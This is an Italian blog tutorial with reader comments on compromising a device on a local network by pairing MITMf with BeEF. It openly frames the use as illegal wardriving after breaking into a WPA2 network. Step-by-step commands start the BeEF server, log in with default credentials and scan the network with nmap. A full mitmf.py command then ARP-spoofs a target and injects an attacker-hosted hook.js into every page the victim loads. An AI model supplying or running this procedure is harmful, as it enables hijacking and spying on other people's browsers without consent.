Infettare un dispositivo utilizzando MITMf e BeEF

Luca Cicchinelli/ gennaio 14, 2017/ Hacking, Linux/ 6 comments

Precedentemente – sulla nostra copia di Kali Linuxsiamo riusciti ad installare MITMf, un tool che mette a disposizione svariati attacchi di tipo Man in the middle.

Supponiamo che state indossando i vostri occhiali con lenti nere mentre – illegalmentestate facendo wardriving.
Riuscite a penetrare – sempre illegalmente – in una rete qualsiasi, magari protetta da una WPA2.

Sì, ok, ma dopo aver curiosato nella lista dei dispositivi connessi ed aver abilitato l’accesso da remoto al router non c’è nient’altro da fare?
Potete – ancora illegalmente – sfruttare l’enorme potenzialità di MITMf, utilizzandolo, per esempio, in combinazione con BeEF.

Cos’è BeEF

BeEF è un tool per effettuare pentesting, che sfrutta le vulnerabilità del browser del dispositivo vittima.
E’ già presente in Kali Linux, perciò non dovremo installare nulla, potremo limitarci ad utilizzarlo.

Il funzionamento di questo tool si basa su un URL – rilasciato dal tool stesso – che se visitato infetta il nostro target.

Dopo che l’infezione sarà avvenuta avremo a disposizione una moltitudine di attacchi, tra cui alcuni di tipo Social engineering davvero interessanti.

Il nostro unico problema rimane, quindi, il dover far visitare l’URL malevolo al nostro target, ed è proprio qui che entra in gioco il nostro amato MITMf.

Come utilizzare BeEF

Innanzitutto dobbiamo avviare il server con il quale comunicheranno i dispositivi infettati.

L’avvio ci fornirà immediatamente l’URL che successivamente inietteremo nel browser del dispositivo vittima utilizzando MITMf.

Quindi apriamo il terminale e rechiamoci nella cartella del tool:

cd /usr/share/beef-xss/

Non dovremo fare altro che avviarlo utilizzando:

./beef

Segniamoci l’Hook URL.

Lasciamo aperto il terminale ed apriamo il browser per recarci nel pannello di controllo fornito da BeEF:

127.0.0.1:3000/ui/panel/

Utilizzando sia come username, che come password, beef effettueremo il login ed avremo accesso al server.

Siamo pronti per iniettare il nostro URL.

Come utilizzare MITMf

Attraverso l’utilizzo di MITMf possiamo iniettare l’Hook URL in ogni richiesta HTTP effettuata dal dispositivo vittima, così che ogni pagina visitata da quest’ultimo venga infettata.

Avremo bisogno di:

  1. Il nome dell’interfaccia di rete da utilizzare
  2. L’indirizzo IP del nostro router
  3. L’indirizzo IP del target
  4. L’Hook URL

Per conoscere il nome della nostra interfaccia di rete, da terminale, utilizziamo:

iwconfig

Per conoscere l’indirizzo IP del nostro router:

route -n

Se non conosciamo l’indirizzo IP del nostro target possiamo effettuare una scansione di rete, per esempio, utilizzando nmap:

nmap -sn 192.168.1.1/24

Ora che abbiamo tutto il necessario rechiamoci, sempre da terminale, nella cartella dove abbiamo precedentemente installato MITMf e digitiamo:

python mitmf.py -i (Interfaccia_di_rete) –spoof –arp –gateway (IP_del_router) –target (IP_del_target) –inject –js-url (Hook_URL)

Io, come sempre, effettuerò l’attacco sul mio dannato Huawei.

Esempio: python mitmf.py -i wlan0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.227 –inject –js-url http://192.168.1.248:3000/hook.js

Quando il nostro target verrà infettato lo sapremo sia dal terminale dov’è avviato MITMf, sia vedendolo comparire nel pannello di controllo di BeEF

Nei successivi tutorial analizzeremo anche come sfruttare al meglio BeEF.

Conclusione

Il fine di HOWORKS è quello di informare, non mi assumo nessuna responsabilità dell’uso che farete delle informazioni contenute in questo articolo.
Per qualsiasi dubbio potete contattarci utilizzando i commenti o le nostre pagine social.

6 Comments

  1. comunque specifica meglio quando effettivamente il target verrà infettato:D
    -Beavy.exe

    1. Quel che puoi vedere dagli ultimi due screen è esattamente quel che succede quando l’infezione va a buon fine.

  2. Ovviamente l attacco puo essere fatto solo sulla stessa rete lan ?

    1. BeEF, con le giuste configurazioni, può funzionare anche fuori dalla propria rete LAN.
      A quel punto, il problema rimane far visitare l’URL al dispositivo vittima, in quanto MITMf può funzionare soltanto all’interno di una LAN.

  3. quando eseguo il comando in python ottengo questo errore: ImportError: No module named magic
    chi sa dirmi cosa va male?

    1. Segnala il problema sul progetto ufficiale di GitHub: [x]

Facci sapere cosa ne pensi con un commento!